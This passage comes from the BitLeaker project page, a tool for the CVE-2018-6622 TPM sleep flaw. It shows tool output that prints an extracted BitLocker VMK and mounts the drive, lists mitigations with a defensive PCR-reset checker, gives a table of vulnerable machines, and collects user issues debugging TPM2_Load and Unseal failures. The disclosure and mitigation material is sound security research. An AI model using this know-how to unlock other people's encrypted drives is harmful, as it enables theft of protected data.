00000040  8b cd 2e 22 14 3d 14 7b  dd 9b 1b 4f 38 fe 3a 44  |...".=.{...O8.:D|
00000050  54 c4 96 94 0e 41 a4 dd  4c a9 ca 76 3e 33 00 00  |T....A..L..v>3..|
00000060  00                                                |.|
    [>>] Success

Mount BitLocker-locked Partition with VMK.
    [>>] VMK = 10C7EA906D6DA4821F96CC816606E912FA0456B35A5C1161FCC5AA746A23F54B
    [>>] Create VMK data... Success
    [>>] Mount BitLocker-Locked partition(/dev/nvme0n1p4)...

Mon Dec  2 01:14:07 2019 [INFO] dislocker by Romain Coltel, v0.7.1 (compiled for Linux/x86_64)
Mon Dec  2 01:14:07 2019 [INFO] Compiled version: master:dcd6b9b
Mon Dec  2 01:14:07 2019 [INFO] Volume GUID (INFORMATION OFFSET) supported
Mon Dec  2 01:14:07 2019 [INFO] BitLocker metadata found and parsed.
Mon Dec  2 01:14:07 2019 [INFO] Used VMK file decryption method
Mon Dec  2 01:14:07 2019 [INFO] Found volume's size: 0xba7bffe00 (50059017728) bytes
Mon Dec  2 01:14:07 2019 [INFO] Running FUSE with these arguments: 
Mon Dec  2 01:14:07 2019 [INFO]   `--> 'dislocker'
Mon Dec  2 01:14:07 2019 [INFO]   `--> './windows'

4. Mitigations

The root cause of CVE-2018-6622 and the related vulnerability is improper handling of an abnormal sleep case, and you can remove the vulnerability with the following options.

  • Use Microsoft's BitLocker with a PIN: If you use a PIN together with the TPM, the VMK of BitLocker cannot be extracted without the PIN.

Set a PIN with a TPM

  • Update your system to the latest BIOS firmware: We reported the vulnerability to major manufacturers such as Intel, Dell, and Lenovo. They have already released new firmware.

  • Disable the sleep feature in your BIOS: Recent BIOS firmware has a feature that disables sleep for several reasons. Therefore, please enter your BIOS setup and disable sleep.
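A defender-side check that complements the options above, added here as an example and not part of the BitLeaker project's code: it parses the `PCR_NN: xx xx ...` listing layout shown in the test example (the format printed by tpm2_pcrread-style tools), decides whether a post-resume PCR bank is still at its TPM2_Startup(CLEAR) defaults (PCRs 0-16 and 23 all zero, PCRs 17-22 all 0xFF, as in the listings above and per the TCG PC Client profile), and reports which PCRs changed between a snapshot taken before sleep and one taken after resume. A bank at startup defaults after S3 means the platform reset the TPM without re-measuring the boot, which is exactly what a fixed BIOS or disabled sleep is meant to prevent. The two sample snapshots are constructed, not captured from a real machine.

```python
"""Check a TPM PCR bank for the post-reset state and diff two snapshots."""
import hashlib
import re

DIGEST_LEN = 32                   # SHA-256 bank
ZERO = bytes(DIGEST_LEN)
ONES = bytes([0xFF]) * DIGEST_LEN
ONES_PCRS = range(17, 23)         # DRTM/locality PCRs start as all-ones (PC Client profile)

# One line of a tpm2_pcrread-style listing: "PCR_07: e5 8a da ..."
PCR_LINE = re.compile(r"^\s*PCR_(\d{2}):\s*((?:[0-9a-fA-F]{2}\s*)+)$")


def parse_pcr_listing(text):
    """Return {pcr_index: digest_bytes} for every PCR_NN line in the text."""
    pcrs = {}
    for line in text.splitlines():
        match = PCR_LINE.match(line)
        if match:
            pcrs[int(match.group(1))] = bytes.fromhex(match.group(2).replace(" ", ""))
    return pcrs


def startup_default(index):
    """Value a PCR holds right after TPM2_Startup(CLEAR), before any extend."""
    return ONES if index in ONES_PCRS else ZERO


def is_reset_state(pcrs):
    """True when every PCR in the listing still holds its startup default."""
    return bool(pcrs) and all(v == startup_default(i) for i, v in pcrs.items())


def changed_pcrs(before, after):
    """Indices present in both snapshots whose values differ."""
    return sorted(i for i in before if i in after and before[i] != after[i])


def assess_resume(before_text, after_text):
    """Compare a pre-sleep PCR listing with a post-resume one.

    Returns 'reset' if the post-resume bank sits at startup defaults,
    'unchanged' if nothing moved, otherwise 'changed:<comma-separated indices>'.
    """
    before = parse_pcr_listing(before_text)
    after = parse_pcr_listing(after_text)
    if is_reset_state(after):
        return "reset"
    changed = changed_pcrs(before, after)
    if not changed:
        return "unchanged"
    return "changed:" + ",".join(str(i) for i in changed)


def render_listing(pcrs):
    """Format a {index: digest} map in the layout parse_pcr_listing reads."""
    lines = ["Bank/Algorithm: TPM_ALG_SHA256(0x000b)"]
    for i in range(24):
        lines.append("PCR_%02d: %s" % (i, " ".join("%02x" % b for b in pcrs[i])))
    return "\n".join(lines)


# Constructed sample snapshots (not captured from a real machine).
# HEALTHY: PCR 0-7 hold made-up boot measurements, the rest are at defaults.
HEALTHY = {i: startup_default(i) for i in range(24)}
for i in range(8):
    HEALTHY[i] = hashlib.sha256(b"constructed boot measurement %d" % i).digest()
# RESET: the bank after TPM2_Startup(CLEAR) with nothing re-measured.
RESET = {i: startup_default(i) for i in range(24)}

HEALTHY_TEXT = render_listing(HEALTHY)
RESET_TEXT = render_listing(RESET)

if __name__ == "__main__":
    print("pre-sleep vs post-resume:", assess_resume(HEALTHY_TEXT, RESET_TEXT))
    print("pre-sleep vs pre-sleep:  ", assess_resume(HEALTHY_TEXT, HEALTHY_TEXT))
```

In practice you would feed `assess_resume` the output of a PCR read taken before suspending and another taken right after resume; a result of `reset` on a machine that is supposed to be patched means the firmware fix or the sleep-disable setting is not actually in effect.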

5. Test Results

| Model | Status | BIOS Vendor | BIOS Version | BIOS Release Date (MM/DD/YYYY) | TPM 2.0 Manufacturer | Vendor String |
|---|---|---|---|---|---|---|
| Intel NUC8i7HVK | Vulnerable | Intel | J68196-503 | 12/17/2018 | Intel, fTPM | Intel |
| Intel NUC5i5MYHE | Vulnerable | Intel | MYBDWi5v.86A.0055.2019.0820.1505 | 08/20/2019 | Infineon (IFX), dTPM | SLB9665 |
| HP EliteDesk 800 G4 | Safe | HP | Q21 | 02/15/2019 | Infineon (IFX), dTPM | SLB9670 |
| Dell Optiplex 7060 | Safe | Dell | 1.4.2 | 06/11/2019 | NTC, dTPM | rls NPCT |
| ASUS Q170M-C | Vulnerable | American Megatrends Inc. | 4212 | 07/24/2019 | Infineon (IFX), dTPM | SLB9665 |
| ASUS PRIME Z390-A | Safe | American Megatrends Inc. | 1302 | 09/02/2019 | Intel, fTPM | Intel |
| ASRock Z390 Extreme | Safe | ASRock | P4.20 | 07/29/2019 | Intel, fTPM | Intel |
| GIGABYTE AORUS Z390 Elite | Safe | American Megatrends Inc. | F8 | 06/05/2019 | Intel, fTPM | Intel |
| GIGABYTE Z370-HD3 | Safe | American Megatrends Inc. | F13 | 08/13/2019 | Intel, fTPM | Intel |
| MSI MAG Z390M MORTAR | Safe | American Megatrends Inc. | 1.50 | 08/08/2019 | Intel, fTPM | Intel |

6. Known Issues

  • Some machines cut power to USB storage during the S3 sleeping state and cannot reconnect it afterwards. In this case, please plug the USB storage into an "always powered" port of your system.
  • Ubuntu 18.04 sometimes fails to find the TPM in your system. In this case, please reboot and try again.
  • If Secure Boot is enabled, you need to enroll the BitLeaker bootloader with the MOK manager.

bitleaker's People

Contributors

kkamagui

bitleaker's Issues

sha1 pcr?

I am attempting to recover my personal data. I first used napper, which reports my system is vulnerable. However, when I run bitleaker, I get the following: "Get PCR data from bitleaker driver.. Fail". Does the bitleaker driver support sha1 pcr data, and is it possible to recover my data using bitleaker?


Does bitleaker have a log?

I was wondering if bitleaker has some kind of log for when you are attempting to boot windows to discover what the TPM messaging looks like? If so, how can I activate it? If not, do you have any ideas on how to implement one? I don't know what kind of logging grub already has available. My current quick approach would be a video camera I guess.

TPM2_Load failure

I'm having a somewhat similar problem to #9. I'm attaching my bitleaker log: log.txt

I'm fairly new to TPM, so I've been trying to understand what is happening. As far as I can tell, bitleaker reads a binary blob from dislocker, and that is supposed to contain 220 bytes of the priv/pub object, and the rest is something else.

Here is the snippet that dislocker is returning:

Tue May  2 10:34:49 2023 [DEBUG] Total datum size: 0x012e (302) bytes
Tue May  2 10:34:49 2023 [DEBUG] Datum entry type: 0
Tue May  2 10:34:49 2023 [DEBUG]    `--> ENTRY TYPE UNKNOWN 1
Tue May  2 10:34:49 2023 [DEBUG] Datum value type: 6
Tue May  2 10:34:49 2023 [DEBUG]    `--> TPM_ENCODED -- Total size header: 12 -- Nested datum: no
Tue May  2 10:34:49 2023 [DEBUG] Status: 0x1
Tue May  2 10:34:49 2023 [DEBUG] Unknown: 0x815
Tue May  2 10:34:49 2023 [DEBUG] Payload:
Tue May  2 10:34:49 2023 [DEBUG] 0x00000000 00 aa 00 20 5d 12 f2 03-70 ef 92 d1 a5 05 e7 c6 
Tue May  2 10:34:49 2023 [DEBUG] 0x00000010 a9 5f 6f 24 e9 d1 66 c6-be 0a a8 d9 c6 07 24 cf 
Tue May  2 10:34:49 2023 [DEBUG] 0x00000020 57 9e cd 47 00 10 7d 34-bb d9 51 a9 aa aa 33 6b 
Tue May  2 10:34:49 2023 [DEBUG] 0x00000030 6c c7 b1 c6 ac ae 7b 43-66 80 ab a9 cb 50 08 f1 
Tue May  2 10:34:49 2023 [DEBUG] 0x00000040 53 84 f5 ac 2f ae 0b d1-54 60 df 71 39 2b 95 31 
Tue May  2 10:34:49 2023 [DEBUG] 0x00000050 99 e3 45 1b cc a8 f6 da-d4 b0 05 e0 60 09 ce 89 
Tue May  2 10:34:49 2023 [DEBUG] 0x00000060 5f c0 8e 72 86 03 62 7d-1c 1d 3e b5 9a 02 67 0b 
Tue May  2 10:34:49 2023 [DEBUG] 0x00000070 35 23 a1 e8 33 e6 f0 ef-38 5d 7d e1 bd ce 48 32 
Tue May  2 10:34:49 2023 [DEBUG] 0x00000080 e9 ca 0a ff a8 87 ab 89-53 fa d7 eb 51 0f 9c c2 
Tue May  2 10:34:49 2023 [DEBUG] 0x00000090 56 b3 b3 f2 a4 41 50 7a-5a d0 b8 06 7f 84 8c 59 
Tue May  2 10:34:49 2023 [DEBUG] 0x000000a0 1b c5 05 69 ed 16 f2 85-49 04 06 03 00 4e 00 08 
Tue May  2 10:34:49 2023 [DEBUG] 0x000000b0 00 0b 00 00 04 12 00 20-f5 10 e7 eb cb a2 25 bc 
Tue May  2 10:34:49 2023 [DEBUG] 0x000000c0 21 68 c2 23 d6 eb 84 1e-7c 03 2c f1 28 1f e5 ab 
Tue May  2 10:34:49 2023 [DEBUG] 0x000000d0 23 c3 73 7e 8a d2 f7 ef-00 10 00 20 75 ff bf 4e 
Tue May  2 10:34:49 2023 [DEBUG] 0x000000e0 cd c7 63 24 ba 6b b7 96-e3 b6 ef 36 e8 80 89 fe 
Tue May  2 10:34:49 2023 [DEBUG] 0x000000f0 57 17 6d d2 a2 be 41 92-42 6b d3 cb 00 20 0a 5b 
Tue May  2 10:34:49 2023 [DEBUG] 0x00000100 7b 84 98 30 8a dc 33 ea-b7 6f 81 6b 7a cb 9d 0d 
Tue May  2 10:34:49 2023 [DEBUG] 0x00000110 91 ab 73 a2 13 74 a3 2b-06 c5 93 7f c9 da 03 15 
Tue May  2 10:34:49 2023 [DEBUG] 0x00000120 08 00 
Tue May  2 10:34:49 2023 [DEBUG] Header safe: 0x12e, 0, 0x6, 0x1
Tue May  2 10:34:49 2023 [DEBUG] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The private portion is 0xaa bytes long. So the public portion should start at 0xac. The size of the public portion is then 0x4e, and so it should end at 0xae + 0x4e = 0xfc. But 0xfc > 0xdc == 220. So it seems like maybe my keys are 0x20 bytes larger than usual, and bitleaker is truncating them, which causes the TPM2_Load to fail?

I am not sure if it is relevant, but I have SecureBoot disabled, and I am running Windows 11.

I'll try to change 220 to 0xfc in bitleaker.py and see if that fixes the TPM error.

Integrate Bitleaker into Kali Linux

Is it possible to integrate Bitleaker into Kali Linux ISO?
I ran ./bootstrap in Cubic, but Build BitLeaker kernel module failed:
make[1]: *** /lib/modules/5.15.0-47-generic/build: No such file or directory. Stop.
make: *** [Makefile:4: all] Error 2

"Clone BitLeaker Bootloader repository and build it" also failed
make[2]: *** [Makefile:6575: grub-core/partmap/libgrubkern_a-gpt.o] Error 1
make[1]: *** [Makefile:11506: all-recursive] Error 1
make[1]: Leaving directory '/git/bitleaker/bitleaker-grub'
make: *** [Makefile:3562: all] Error 2
./build.sh: line 9: ../grub-mkimage: No such file or directory
sudo: unable to resolve host cubic: Temporary failure in name resolution
cp: cannot stat 'grub-core/grubx64.efi': No such file or directory

Bitleaker targeted the wrong partition?

The targeted disk has 5 partitions

sda4 should be the primary system drive for Windows.

When I ran bitleaker.py, the program runs normally but ends with an error:

BitLeaker: Error. /dev/sda3 is not BitLocker-locked partition

implicit declaration of function ‘ioremap_nocache’

Any chance to fix this error (newest ubuntu):

error: implicit declaration of function ‘ioremap_nocache’ [-Werror=implicit-function-declaration]
60 | buffer = (char*) ioremap_nocache(RESERVED_START, RESERVED_SIZE);
| ^~~~~~~~~~~~~~~
/home/karol/bitleaker/bitleaker-kernel-module/bitleaker-kernel-module.c:60:18: warning: cast to pointer from integer of different size [-Wint-to-pointer-cast]
60 | buffer = (char*) ioremap_nocache(RESERVED_START, RESERVED_SIZE);
| ^
/home/karol/bitleaker/bitleaker-kernel-module/bitleaker-kernel-module.c:85:9: error: implicit declaration of function ‘iounmap’; did you mean ‘do_munmap’? [-Werror=implicit-function-declaration]
85 | iounmap(buffer);
| ^~~~~~~
| do_munmap
cc1: some warnings being treated as errors
make[2]: *** [scripts/Makefile.build:257: /home/karol/bitleaker/bitleaker-kernel-module/bitleaker-kernel-module.o] Error 1
make[1]: *** [Makefile:1850: /home/karol/bitleaker/bitleaker-kernel-module] Error 2
make[1]: Leaving directory '/usr/src/linux-headers-5.19.0-38-generic'
make: *** [Makefile:4: all] Error 2
Finished.

Grub cannot read Event Log

Hi,

I checked the device with napper (and it said the device is vulnerable). I installed Ubuntu 18.04 on a USB stick and built the bitleaker tool.
When I start from the stick, it says that the UEFI event log cannot be read due to invalid parameters. On another machine, grub can read the event log, but the device is not vulnerable. The difference between the two devices is that the vulnerable device uses an Intel fTPM and the other a dTPM.
Does anyone have a clue where the error is? I changed nothing.

V1 Steps?

Hi. I was asking before about V1 code. I modified your code to use either the V1 or the V2 code depending on which key you press at boot time. I've been working on trying to get the script to work. I've been able to get most of the pieces, but I wanted to find out if there was a SHA1 that needed to be used for the signature? I've checked a few things (I monitored the LPC bus, and checked against the data you recovered). And I still seem to be missing something, as I get all the way to the Unseal command and it fails. I can't give you direct logs or anything now because I don't have the system available. Unfortunately, I don't have a compiler handy to compile PCRTool, which I believe would be helpful, but I can't find an executable, just source code (I can't compile on my target. No compiler). Also, it seems that there might be more things sent to the TPM than got logged. Maybe there is another way to check this Windows TPM logs?

This isn't really a bug, but there didn't seem like a better place to put this.

Napper 1.3 is stuck with no results at the "Reading PCR values of TPM and checking a vulnerability ..." step

Hi, I'm trying to recover my data from my Dell Latitude 5511 laptop, as I cannot recover the recovery key since I've never activated bitlocker.
I found your amazing project and I thought perhaps I have a chance to get back my data.
I ran the Napper 1.3 live CD, but after starting Napper it seems to be stuck with no progress at the "Reading PCR values of TPM and checking a vulnerability ..." step. I noted that there is an error; I will add a picture to let you understand my problem better.
Can you please help me?

Output Size 10, Results: Fail! (after success to Unseal data etc.)

Hi There,

I wonder if you can help.

I'm trying to mount a Windows 10 partition that is currently locked by TPM. (TPM with Secure Boot ON appears to unlock the drive and try to boot the Windows partition).

Bitleaker appears to be my last hope.

When running this tool on a USB setup of Ubuntu 18.04.6 LTS (in UEFI mode) I get the below results:

Preparing TPM data.
    [>>] Get TPM-encoded blob from dislocker... Success
    [>>] Convert TPM-encoded blob to hex data... Success
    [>>] Create TPM2_Load data... Success
    [>>] Create TPM2_StartSession data... Success
    [>>] Create TPM2_PolicyAuthorize data... Success
    [>>] Create TPM2_PolicyPCR data... Success
    [>>] Create TPM2_Unseal data... Success

Execute TPM commands
    [>>] Execute TPM2_Load... Input file tpm2_load.bin
Initializing Local Device TCTI Interface
    [*] Input Size 247
00000000  80 02 00 00 00 f7 00 00  01 57 81 00 00 01 00 00  |.........W......|
00000010  00 09 40 00 00 09 00 00  00 00 00 00 8a 00 20 ba  |..@........... .|
00000020  75 54 35 6a 9f e1 13 d5  45 a8 c0 5a 71 05 a1 f2  |uT5j....E..Zq...|
00000030  94 54 3f 5d f2 6e de b4  b8 54 70 73 7f 42 11 00  |.T?].n...Tps.B..|
00000040  10 34 f2 6e e4 c9 f2 71  a7 c6 5a d6 c1 d5 10 5c  |.4.n...q..Z....\|
00000050  02 ef d5 11 c4 dd 4c 17  07 0b 2f ce 14 71 6e 61  |......L.../..qna|
00000060  ac 54 0a d4 22 d7 b9 42  f7 08 a0 b0 d4 f8 a3 45  |.T.."..B.......E|
00000070  8e 18 e9 e7 c8 2b 40 8e  e2 ff 2c a5 72 1b d0 b7  |.....+@...,.r...|
00000080  86 85 79 84 44 39 1d 0c  9b 3c 00 3a 16 cd f6 28  |..y.D9...<.:...(|
00000090  48 e3 5d e9 dd bf d7 2e  de 1b ed f2 a1 a1 d1 e9  |H.].............|
000000a0  48 32 3e fd 69 fb 8e 00  4e 00 08 00 0b 00 00 04  |H2>.i...N.......|
000000b0  12 00 20 50 03 70 af 37  9b 13 5f fd a0 d4 fd 9f  |.. P.p.7.._.....|
000000c0  d3 8f 1a ae 99 b4 5d ef  7f b8 65 07 53 47 ff de  |......]...e.SG..|
000000d0  18 a0 0c 00 10 00 20 53  57 d7 1a c7 40 6d 99 81  |...... SW...@m..|
000000e0  db 50 37 d5 5d de 55 9b  89 9a d6 79 4b 16 7a 9a  |.P7.].U....yK.z.|
000000f0  e6 63 d1 50 ce b6 30                              |.c.P..0|

    [*] Output Size 10, Result: Fail!
00000000  80 01 00 00 00 0a 00 00  01 8b                    |..........|
    [>>] Fail

Any idea what I can do to proceed please?

I currently have Secure Boot disabled in the BIOS to allow me to get to this stage.

I did notice it's showing PCR 0 at the start though?

    BitLeaker v1.0 for decrypting BitLocker with the TPM vulnerability
             Made by Seunghun Han, https://kkamagui.github.io
           Project link: https://github.com/kkamagui/bitleaker 

Search for BitLocker-locked partitions.
    [>>] BitLocker-locked partition is [/dev/sda4]

Loading BitLeaker kernel module... Success
Entering sleep...
    [>>] Please press any key or power button to wake up...
Waking up...
    [>>] Please press any key to continue...

Preparing PCR data.
    [>>] Get PCR data from BitLeaker driver... Success

Cut and extract essential PCR data.
    [>>] Extract PCR numbers and SHA256 hashes... Success

Replay TPM data.
    [>>] Checking the resource manager process... Success
    [>>] PCR 0 , SHA256 = 69614becb0612e90ed4f22ed22318184a3ad475b27cd17c738a2f6f6ca68194d
PCR Num 0
69614becb0612e90ed4f22ed22318184a3ad475b27cd17c738a2f6f6ca68194d
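This post and the earlier one about the 0xac/0xfc offsets both come down to the same two questions: where inPrivate ends and inPublic begins inside the TPM2_Load command, and what the 10-byte reply means. The following is an added example, not code from bitleaker or from either poster: it walks the command retyped from the hex dump above, checks that the walk lands exactly on commandSize (a truncated blob shows up as a mismatch), and names the response code. It assumes only the TPM 2.0 Part 2/Part 3 structure layouts.

```python
import struct

# Constructed input: the 247-byte TPM2_Load command and its 10-byte reply,
# retyped from the hex dumps in the post above (not the project's own code).
TPM2_LOAD_CMD = bytes.fromhex(
    "8002000000f700000157810000010000" "0009400000090000000000008a0020ba"
    "7554356a9fe113d545a8c05a7105a1f2" "94543f5df26edeb4b85470737f421100"
    "1034f26ee4c9f271a7c65ad6c1d5105c" "02efd511c4dd4c17070b2fce14716e61"
    "ac540ad422d7b942f708a0b0d4f8a345" "8e18e9e7c82b408ee2ff2ca5721bd0b7"
    "8685798444391d0c9b3c003a16cdf628" "48e35de9ddbfd72ede1bedf2a1a1d1e9"
    "48323efd69fb8e004e0008000b000004" "120020500370af379b135ffda0d4fd9f"
    "d38f1aae99b45def7fb865075347ffde" "18a00c001000205357d71ac7406d9981"
    "db5037d55dde559b899ad6794b167a9a" "e663d150ceb630"
)
TPM2_LOAD_RESP = bytes.fromhex("80010000000a0000018b")

# A few format-one error numbers from TPM 2.0 Part 2 (TPM_RC, low 6 bits).
RC_FMT1_NAMES = {0x0B: "TPM_RC_HANDLE", 0x0E: "TPM_RC_AUTH_FAIL", 0x15: "TPM_RC_SIZE",
                 0x1D: "TPM_RC_POLICY_FAIL", 0x1F: "TPM_RC_INTEGRITY"}

def parse_tpm2_load(cmd: bytes) -> dict:
    """Walk header, parentHandle, authorization area, inPrivate (TPM2B_PRIVATE)
    and inPublic (TPM2B_PUBLIC); the walk must end exactly at commandSize."""
    tag, cmd_size, cc = struct.unpack(">HII", cmd[:10])
    parent = struct.unpack(">I", cmd[10:14])[0]
    off = 14
    if tag == 0x8002:  # TPM_ST_SESSIONS: an authorization area follows the handle
        off += 4 + struct.unpack(">I", cmd[off:off + 4])[0]
    priv_size = struct.unpack(">H", cmd[off:off + 2])[0]
    pub_off = off + 2 + priv_size  # inPublic starts right after inPrivate
    pub_size = struct.unpack(">H", cmd[pub_off:pub_off + 2])[0]
    end = pub_off + 2 + pub_size
    # Leading TPMT_PUBLIC fields: type, nameAlg, objectAttributes.
    ptype, name_alg, attrs = struct.unpack(">HHI", cmd[pub_off + 2:pub_off + 10])
    return {"command_code": cc, "parent": parent, "private_size": priv_size,
            "public_off": pub_off, "public_size": pub_size, "end": end,
            "command_size": cmd_size, "public_type": ptype, "name_alg": name_alg,
            "attributes": attrs, "consistent": end == cmd_size == len(cmd)}

def decode_rc(resp: bytes) -> str:
    """Name a response code; a format-one code also says which handle,
    parameter or session was rejected (bits 11:8, bit 6 set = parameter)."""
    rc = struct.unpack(">HII", resp[:10])[2]
    if not rc & 0x80:
        return "TPM_RC_SUCCESS" if rc == 0 else f"format-zero error 0x{rc:03x}"
    name = RC_FMT1_NAMES.get(rc & 0x3F, f"TPM_RC_FMT1+0x{rc & 0x3F:02x}")
    n = (rc >> 8) & 0xF
    if rc & 0x40:
        return f"{name} (parameter {n})"
    return f"{name} (session {n & 7})" if n & 8 else f"{name} (handle {n})"
```

On this dump the walk ends at 0xf7, matching commandSize, and the reply 0x018b decodes to TPM_RC_HANDLE for handle 1, which is the parentHandle 0x81000001.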

Bitleaker bootloader is not published

When trying to run bootstrap, it attempts this step:

git clone https://github.com/kkamagui/bitleaker-grub.git

However, that repository doesn't seem to be published yet. Are you planning on releasing that?

How make bitleaker USB

Great job!!!!
Maybe you are planning to release a ready bitleaker USB version (.iso) ? I want to test this on my system.
Or maybe you can give some advice how can I do it myself (how to create a bootable bitleaker USB).

Thank you!

Get PCR data from BitLeaker driver... Fail

Failed at getting PCR data from BitLeaker driver. No more details directly available. Is this error code common?
I was able to get some PCR output from napper-for-tpm, but no success with bitleaker.

Alienware 15 R3 Intel PTT, secure boot disabled

root@ubuntu:~/bitleaker# ./bitleaker.py

BitLeaker v1.0 for decrypting BitLocker with the TPM vulnerability
         Made by Seunghun Han, https://kkamagui.github.io
       Project link: https://github.com/kkamagui/bitleaker 

Search for BitLocker-locked partitions.
[>>] BitLocker-locked partition is [/dev/nvme0n1p3]

Loading BitLeaker kernel module... Success
Entering sleep...
[>>] Please press any key or power button to wake up...
Waking up...
[>>] Please press any key to continue...

Preparing PCR data.
[>>] Get PCR data from BitLeaker driver... Fail

TPM2_Load response too short?

Everything appears to be working beautifully but the data seems to be a lot shorter than the other logs I have seen which is causing it to fail. The unit is a NUC using Intel PTT


Any ideas would be greatly appreciated
